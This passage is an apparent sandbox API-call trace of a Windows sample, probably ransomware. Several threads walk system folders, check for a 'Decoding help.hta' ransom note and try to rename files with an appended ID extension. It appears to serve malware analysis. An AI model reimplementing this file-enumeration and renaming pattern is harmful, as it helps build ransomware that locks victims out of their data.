ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Content", cAlternateFileName="")) returned 1 [0054.439] lstrcmpW (lpString1=".", lpString2="Content") returned -1 [0054.439] lstrcmpW (lpString1="..", lpString2="Content") returned -1 [0054.439] lstrcmpiW (lpString1="windows", lpString2="Content") returned 1 [0054.439] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" [0054.439] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned 68 [0054.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\", lpString2="Content" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content" [0054.439] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*.*" [0054.439] GlobalMemoryStatus (in: lpBuffer=0x11adfd10 | out: lpBuffer=0x11adfd10) [0054.439] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x1105f798, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x570 [0054.442] CloseHandle (hObject=0x570) returned 1 [0054.442] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 1 [0054.442] lstrcmpW (lpString1=".", lpString2="MetaData") returned -1 [0054.442] lstrcmpW (lpString1="..", lpString2="MetaData") returned -1 [0054.442] lstrcmpiW (lpString1="windows", lpString2="MetaData") returned 1 [0054.444] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*" [0054.444] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*.*") returned 68 [0054.444] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\", lpString2="MetaData" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData" [0054.444] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*.*" [0054.444] GlobalMemoryStatus (in: lpBuffer=0x11adfd10 | out: lpBuffer=0x11adfd10) [0054.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2a7883b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x570 [0054.447] CloseHandle (hObject=0x570) returned 1 [0054.447] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x11adfd30 | out: lpFindFileData=0x11adfd30*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6451100, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MetaData", cAlternateFileName="")) returned 0 [0054.447] FindClose (in: hFindFile=0x5e2db0 | out: hFindFile=0x5e2db0) returned 1 Thread: id = 664 os_tid = 0xea4 [0054.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*", lpFindFileData=0x1299fd30 | out: lpFindFileData=0x1299fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2bb0 [0054.440] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.440] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1299fd30 | out: lpFindFileData=0x1299fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3fc949a4, ftCreationTime.dwHighDateTime=0x1ca0445, ftLastAccessTime.dwLowDateTime=0xa8f17049, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x243448f1, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.440] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.441] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.441] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1299fd30 | out: lpFindFileData=0x1299fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0054.441] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0054.441] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0054.441] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0054.441] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*" [0054.441] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\*.*") returned 58 [0054.441] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US" [0054.441] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\1.0\\en-US\\*.*" [0054.441] GlobalMemoryStatus (in: lpBuffer=0x1299fd10 | out: lpBuffer=0x1299fd10) [0054.441] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98e2980, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x728 [0054.446] CloseHandle (hObject=0x728) returned 1 [0054.447] FindNextFileW (in: hFindFile=0x5e2bb0, lpFindFileData=0x1299fd30 | out: lpFindFileData=0x1299fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x243448f1, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xae0e8854, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xae0e8854, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0054.447] FindClose (in: hFindFile=0x5e2bb0 | out: hFindFile=0x5e2bb0) returned 1 Thread: id = 665 os_tid = 0xea8 [0054.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", lpFindFileData=0x12a9fd30 | out: lpFindFileData=0x12a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2770 [0054.446] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.446] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x12a9fd30 | out: lpFindFileData=0x12a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.446] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.446] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.446] FindNextFileW (in: hFindFile=0x5e2770, lpFindFileData=0x12a9fd30 | out: lpFindFileData=0x12a9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0054.446] FindClose (in: hFindFile=0x5e2770 | out: hFindFile=0x5e2770) returned 1 Thread: id = 666 os_tid = 0xeac [0054.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\*.*", lpFindFileData=0x12b9fd30 | out: lpFindFileData=0x12b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2db0 [0054.448] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.448] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x12b9fd30 | out: lpFindFileData=0x12b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.448] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.448] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.448] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x12b9fd30 | out: lpFindFileData=0x12b9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0054.448] FindClose (in: hFindFile=0x5e2db0 | out: hFindFile=0x5e2db0) returned 1 Thread: id = 667 os_tid = 0xeb0 [0054.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\DSS\\MachineKeys\\*.*", lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2db0 [0054.449] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.449] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.450] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.450] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.450] FindNextFileW (in: hFindFile=0x5e2db0, lpFindFileData=0x12c9fd30 | out: lpFindFileData=0x12c9fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd943744, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb66d81ea, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0054.450] FindClose (in: hFindFile=0x5e2db0 | out: hFindFile=0x5e2db0) returned 1 Thread: id = 668 os_tid = 0xeb4 [0054.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpFindFileData=0x1301fd30 | out: lpFindFileData=0x1301fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8b10 [0055.545] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.545] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0x1301fd30 | out: lpFindFileData=0x1301fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.422] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.422] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.422] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0x1301fd30 | out: lpFindFileData=0x1301fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f07a66f, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f07a66f, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76b3ce5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0056.677] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0056.677] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0056.677] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" [0056.677] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\decoding help.hta")) returned 0x20 [0059.206] lstrcmpiW (lpString1="Decoding help.hta", lpString2="background.png") returned 1 [0059.206] lstrlenW (lpString="background.png") returned 14 [0059.206] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0059.206] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0059.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="background.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" [0059.206] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" [0059.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.206] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.206] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0x1301fd30 | out: lpFindFileData=0x1301fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c5b0d9, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0xc7c5b0d9, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0xc7c5b0d9, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xb61, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0059.206] lstrcpyW (in: lpString1=0x2ab59180, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0059.206] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0059.206] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" [0059.207] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Decoding help.hta" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\decoding help.hta")) returned 0x20 [0059.207] lstrcmpiW (lpString1="Decoding help.hta", lpString2="behavior.xml") returned 1 [0059.207] lstrlenW (lpString="behavior.xml") returned 12 [0059.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*" [0059.207] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*") returned 95 [0059.207] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpString2="behavior.xml" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" [0059.207] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" [0059.207] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0059.207] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.207] FindNextFileW (in: hFindFile=0x5d8b10, lpFindFileData=0x1301fd30 | out: 